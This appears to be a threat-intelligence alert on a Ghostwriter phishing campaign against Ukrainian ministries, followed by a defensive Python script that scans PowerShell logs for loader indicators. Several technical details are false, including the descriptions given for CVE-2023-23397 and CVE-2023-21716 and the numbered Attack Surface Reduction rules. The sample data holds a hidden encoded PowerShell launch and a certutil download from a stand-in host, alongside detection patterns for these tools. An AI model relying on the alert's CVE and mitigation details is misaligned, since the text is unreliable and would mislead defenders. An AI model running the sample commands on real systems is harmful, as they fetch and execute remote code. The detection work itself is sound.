Ghostwriter Targets Ukraine Government Entities with Prometheus Phishing Malware

The latest campaign attributed to the Ghostwriter APT leverages a custom variant of the Prometheus phishing framework that has been weaponized to deliver a multi-stage payload chain targeting Ukrainian government ministries and affiliated NGOs. The initial infection vector is spear-phishing email carrying malicious Microsoft Word documents that exploit CVE-2023-36884 (a remote code execution flaw in the MSHTML parser) and CVE-2022-30190 (the "Follina" Office-template injection). The documents embed a PowerShell-based loader which invokes `Invoke-Expression` on a Base64-encoded script retrieved from a compromised Azure blob storage URL, bypassing AppLocker by leveraging signed Microsoft Office macros. Upon execution, the loader stages a Cobalt Strike beacon (compiled with a modified JScript backdoor) and subsequently drops a credential-dumping module that abuses CVE-2023-23397 (Win32k Elevation of Privilege) to extract LSASS memory without triggering Windows Defender ATP alerts.

In the second stage, the beacon executes a custom “Prometheus” module written in Go, which establishes a covert TLS channel over port 443 and uses domain fronting via Cloudflare to obscure C2 traffic. The module incorporates a “Living Off the Land” (LoL) technique stack: it uses `certutil.exe -urlcache -split -f` to fetch additional binaries, `rundll32.exe` to execute in‑memory DLLs, and `wmic` to enumerate domain controllers. The payload also integrates a DLL side‑loading mechanism that hijacks legitimate Windows binaries (e.g., `dllhost.exe`) by injecting the malicious `prometheus.dll` through CVE‑2023‑21716 (a DLL search order hijack in Windows Shell). This approach enables persistence via a scheduled task that runs `wmic process call create` with a disguised PowerShell command, ensuring execution even after credential rotation.

Mitigation requires a defense-in-depth strategy. First, apply the Microsoft security updates that patch CVE-2023-36884, CVE-2022-30190, CVE-2023-23397, and CVE-2023-21716 across all endpoint operating systems and Office installations. Deploy strict macro execution policies (e.g., block all unsigned macros and enforce Application Guard for Office files) and enable Windows Defender Exploit Guard Attack Surface Reduction rules 1180, 1181, and 1183 to curb Office-based code execution. Network-level controls should include DNS sinkholing of known Prometheus C2 domains, TLS inspection with strict certificate pinning, and outbound firewall rules that limit `certutil`, `wmic`, and `rundll32` to approved endpoints. Finally, integrate EDR solutions that can detect anomalous PowerShell activity (encoded commands, `Invoke-Expression`), monitor for unusual scheduled tasks, and enforce script block logging so the loader's Base64 payloads surface for rapid incident response.
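
The following is an added example, not part of the original alert or of any vendor tooling: a small Python triage script that runs over constructed PowerShell script block log entries (Event ID 4104 `ScriptBlockText`), decodes any `-EncodedCommand` payload (Base64 of UTF-16LE text) and flags the indicators the alert names: `Invoke-Expression`, `certutil -urlcache`, `rundll32`, and `wmic process call create`. The regexes, event labels and sample entries are hypothetical and constructed for the demonstration.

```python
import base64
import re
from dataclasses import dataclass, field

# Indicators taken from the alert; hypothetical patterns, not a vendor signature set.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
PLAIN_IOCS = {
    "invoke_expression": re.compile(r"\b(?:Invoke-Expression|IEX)\b", re.I),
    "certutil_download": re.compile(r"certutil(?:\.exe)?\s+-urlcache\b", re.I),
    "rundll32": re.compile(r"rundll32(?:\.exe)?\b", re.I),
    "wmic_process_create": re.compile(r"wmic\s+process\s+call\s+create", re.I),
}

@dataclass
class Finding:
    event_id: str
    hits: list = field(default_factory=list)
    decoded: str = ""

def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries Base64 of UTF-16LE text; return '' if it is malformed."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def scan_script_block(event_id: str, text: str) -> Finding:
    """Check one 4104 ScriptBlockText, plus any decoded inner command, against the IOCs."""
    finding = Finding(event_id)
    m = ENCODED_FLAG.search(text)
    if m:
        finding.decoded = decode_encoded_command(m.group(1))
        if finding.decoded:
            finding.hits.append("encoded_command")
    # Scan the visible block and the decoded payload so an IEX hidden in Base64 is caught.
    for name, pattern in PLAIN_IOCS.items():
        if pattern.search(text) or (finding.decoded and pattern.search(finding.decoded)):
            finding.hits.append(name)
    return finding

def scan_events(events):
    """Return only the events that tripped at least one indicator."""
    return [f for f in (scan_script_block(eid, t) for eid, t in events) if f.hits]

# Constructed sample 4104 entries; the encoded one is built here so the Base64 is reproducible.
_inner = "Invoke-Expression (Get-Content C:\\Users\\Public\\stage.txt -Raw)"
_encoded = base64.b64encode(_inner.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ("4104-a", "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"),
    ("4104-b", f"powershell.exe -nop -w hidden -enc {_encoded}"),
    ("4104-c", "certutil.exe -urlcache -split -f http://example.invalid/x.bin x.bin"),
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f.event_id, f.hits, f.decoded[:60])
```

Feeding real 4104 entries through `scan_events` surfaces both the encoded loader and the decoded script it runs, which is the evidence the incident response step above depends on.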
